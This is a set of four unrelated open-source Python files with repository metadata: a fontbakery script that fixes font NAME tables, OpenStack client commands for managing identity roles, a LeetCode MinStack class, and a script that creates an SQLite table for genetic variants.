# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License
import argparse
import os
import os.path
from bakery_cli.fixers import FamilyAndStyleNameFixer
description = 'Fixes TTF NAME table naming values to work with Windows GDI'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('ttf_font', nargs='+',
help='Font in OpenType (TTF/OTF) format')
parser.add_argument('--autofix', action='store_true', help='Apply autofix')
args = parser.parse_args()
for path in args.ttf_font:
if not os.path.exists(path):
continue
FamilyAndStyleNameFixer(None, path).apply()
|
davelab6/fontbakery
|
tools/fontbakery-fix-opentype-names.py
|
Python
|
apache-2.0
| 1,293
|
# Copyright 2012-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Role action implementations"""
import logging
from cliff import command
from cliff import lister
from cliff import show
from openstackclient.common import utils
class AddRole(show.ShowOne):
"""Add role to tenant:user"""
api = 'identity'
log = logging.getLogger(__name__ + '.AddRole')
def get_parser(self, prog_name):
parser = super(AddRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role name or ID to add to user')
parser.add_argument(
'--tenant',
metavar='<tenant>',
required=True,
help='Name or ID of tenant to include')
parser.add_argument(
'--user',
metavar='<user>',
required=True,
help='Name or ID of user to include')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
tenant = utils.find_resource(identity_client.tenants,
parsed_args.tenant)
user = utils.find_resource(identity_client.users, parsed_args.user)
role = identity_client.roles.add_user_role(
user,
role,
tenant)
info = {}
info.update(role._info)
return zip(*sorted(info.iteritems()))
class CreateRole(show.ShowOne):
"""Create new role"""
api = 'identity'
log = logging.getLogger(__name__ + '.CreateRole')
def get_parser(self, prog_name):
parser = super(CreateRole, self).get_parser(prog_name)
parser.add_argument(
'role_name',
metavar='<role-name>',
help='New role name')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = identity_client.roles.create(parsed_args.role_name)
info = {}
info.update(role._info)
return zip(*sorted(info.iteritems()))
class DeleteRole(command.Command):
"""Delete existing role"""
api = 'identity'
log = logging.getLogger(__name__ + '.DeleteRole')
def get_parser(self, prog_name):
parser = super(DeleteRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Name or ID of role to delete')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
identity_client.roles.delete(role.id)
return
class ListRole(lister.Lister):
"""List roles"""
api = 'identity'
log = logging.getLogger(__name__ + '.ListRole')
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
columns = ('ID', 'Name')
data = self.app.client_manager.identity.roles.list()
return (columns,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class ListUserRole(lister.Lister):
"""List user-role assignments"""
api = 'identity'
log = logging.getLogger(__name__ + '.ListUserRole')
def get_parser(self, prog_name):
parser = super(ListUserRole, self).get_parser(prog_name)
parser.add_argument(
'user',
metavar='<user>',
nargs='?',
help='Name or ID of user to include')
parser.add_argument(
'--tenant',
metavar='<tenant>',
help='Name or ID of tenant to include')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
columns = ('ID', 'Name', 'Tenant ID', 'User ID')
identity_client = self.app.client_manager.identity
# user-only roles are not supported in KSL so we are
# required to have a user and tenant; default to the
# values used for authentication if not specified
if not parsed_args.tenant:
parsed_args.tenant = identity_client.auth_tenant_id
if not parsed_args.user:
parsed_args.user = identity_client.auth_user_id
tenant = utils.find_resource(identity_client.tenants,
parsed_args.tenant)
user = utils.find_resource(identity_client.users, parsed_args.user)
data = identity_client.roles.roles_for_user(user.id, tenant.id)
# Add the names to the output even though they will be constant
for role in data:
role.user_id = user.name
role.tenant_id = tenant.name
return (columns,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class RemoveRole(command.Command):
"""Remove role from tenant:user"""
api = 'identity'
log = logging.getLogger(__name__ + '.RemoveRole')
def get_parser(self, prog_name):
parser = super(RemoveRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role name or ID to remove from user')
parser.add_argument(
'--tenant',
metavar='<tenant>',
required=True,
help='Name or ID of tenant')
parser.add_argument(
'--user',
metavar='<user>',
required=True,
help='Name or ID of user')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
tenant = utils.find_resource(identity_client.tenants,
parsed_args.tenant)
user = utils.find_resource(identity_client.users, parsed_args.user)
identity_client.roles.remove_user_role(
user.id,
role.id,
tenant.id)
class ShowRole(show.ShowOne):
"""Show single role"""
api = 'identity'
log = logging.getLogger(__name__ + '.ShowRole')
def get_parser(self, prog_name):
parser = super(ShowRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Name or ID of role to display')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
info = {}
info.update(role._info)
return zip(*sorted(info.iteritems()))
|
hughsaunders/python-openstackclient
|
openstackclient/identity/v2_0/role.py
|
Python
|
apache-2.0
| 7,727
|
class MinStack(object):
def __init__(self):
"""
initialize your data structure here.
"""
self.stack = []
def push(self, x):
"""
:type x: int
:rtype: void
"""
cur_min = self.getMin()
min = x if cur_min is None or x < cur_min else cur_min
self.stack.append((x,min))
def pop(self):
"""
:rtype: void
"""
if len(self.stack) == 0:
return
else:
self.stack = self.stack[:-1]
def top(self):
"""
:rtype: int
"""
if len(self.stack) == 0:
return None
else:
return self.stack[-1][0]
def getMin(self):
"""
:rtype: int
"""
if len(self.stack) == 0:
return None
else:
return self.stack[-1][1]
# Your MinStack object will be instantiated and called as such:
# obj = MinStack()
# obj.push(x)
# obj.pop()
# param_3 = obj.top()
# param_4 = obj.getMin()
|
scream7/leetcode
|
algorithms/python/155.py
|
Python
|
apache-2.0
| 1,066
|
import sqlite3
# the filename of this SQLite database
db_filename = "variants.db"
# initialize database connection
conn = sqlite3.connect(db_filename)
c = conn.cursor()
table_def = """\
CREATE TABLE variants(
id integer primary key,
chrom test,
start integer,
end integer,
strand text,
rsid text);
"""
c.execute(table_def)
conn.commit()
conn.close()
|
jaehyuk/bds-files
|
chapter-13-out-of-memory/create_table.py
|
Python
|
mit
| 368
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.